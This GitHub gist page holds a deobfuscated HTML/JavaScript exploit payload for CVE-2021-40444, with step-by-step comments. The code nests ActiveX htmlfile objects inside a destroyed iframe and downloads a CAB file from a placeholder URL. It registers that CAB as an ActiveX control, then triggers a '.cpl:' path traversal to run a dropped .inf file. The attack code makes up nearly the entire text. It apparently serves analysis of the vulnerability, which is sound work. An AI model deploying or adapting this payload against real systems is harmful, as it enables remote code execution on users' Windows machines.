Skip to content

Instantly share code, notes, and snippets.

@D4stiny
Created January 7, 2022 09:13
Show Gist options
  • Save D4stiny/1692ded337b67bfbeea10f2269af81fe to your computer and use it in GitHub Desktop.
Save D4stiny/1692ded337b67bfbeea10f2269af81fe to your computer and use it in GitHub Desktop.
Deobfuscated HTML payload used in CVE-2021-40444 payload
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Expires" content="-1">
<meta http-equiv="X-UA-Compatible" content="IE=11">
</head>
<body>
<script>
var exploit_cab = "[CAB file URL]";
function exploit() {
//
// Create an iframe element.
//
var iframe_element = document.createElement("iframe");
try {
document.body.appendChild(iframe_element);
} catch (err) {
document.documentElement.appendChild(iframe_element);
}
//
// Retrieve the ActiveXObject for the new iframe element.
//
var iframe_activex = iframe_element.contentWindow.ActiveXObject;
var base_activex = new iframe_activex("htmlfile");
//
// Initialize and destroy the iframe.
//
iframe_element.contentDocument.open().close();
try {
document.body.removeChild(iframe_element);
} catch (err) {
document.documentElement.removeChild(iframe_element);
}
//
// Initialize the destroyed iframe's ActiveX element.
//
base_activex.open().close();
//
// Create a nested ActiveX object inside the destroyed iframe.
// destroyed iframe ->
// base ActiveX ->
// (this element) nested ActiveX #1
//
var activex_nested_1 = new base_activex.Script.ActiveXObject("htmlFile");
activex_nested_1.open().close();
//
// Create another nested ActiveX object inside the previous nested object.
// destroyed iframe ->
// base ActiveX ->
// nested ActiveX #1 ->
// (this element) nested ActiveX #2
//
var activex_nested_2 = new activex_nested_1.Script.ActiveXObject("htmlFile");
activex_nested_2.open().close();
//
// Create another nested ActiveX object inside the previous nested object.
// destroyed iframe ->
// base ActiveX ->
// nested ActiveX #1 ->
// nested ActiveX #2 ->
// (this element) nested ActiveX #3
//
var activex_nested_3 = new activex_nested_2.Script.ActiveXObject("htmlFile");
activex_nested_3.open().close();
var cab_request = new XMLHttpRequest();
cab_request.open("GET", exploit_cab);
cab_request.send();
activex_nested_3.Script.document.write("<body>");
var activex_control = activex_nested_3.Script.document.createElement("object");
//
// https://docs.microsoft.com/en-us/cpp/mfc/upgrading-an-existing-activex-control?view=msvc-160#using-the-codebase-tag-with-a-cab-file
//
activex_control.setAttribute("codebase", exploit_cab + "#version=5,0,0,0");
activex_control.setAttribute("classid", "CLSID:deadbeef-cafe-babe-aaaa-deadbeeeeeef");
//
// Trigger the CAB file as an ActiveX control.
//
activex_nested_3.Script.document.body.appendChild(activex_control);
//
// Launch the payload.
//
var payload_trigger = new ActiveXObject("htmlfile");
payload_trigger.Script.location = ".cpl:../../../AppData/Local/Temp/msword.inf";
}
exploit();
</script>
</body>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment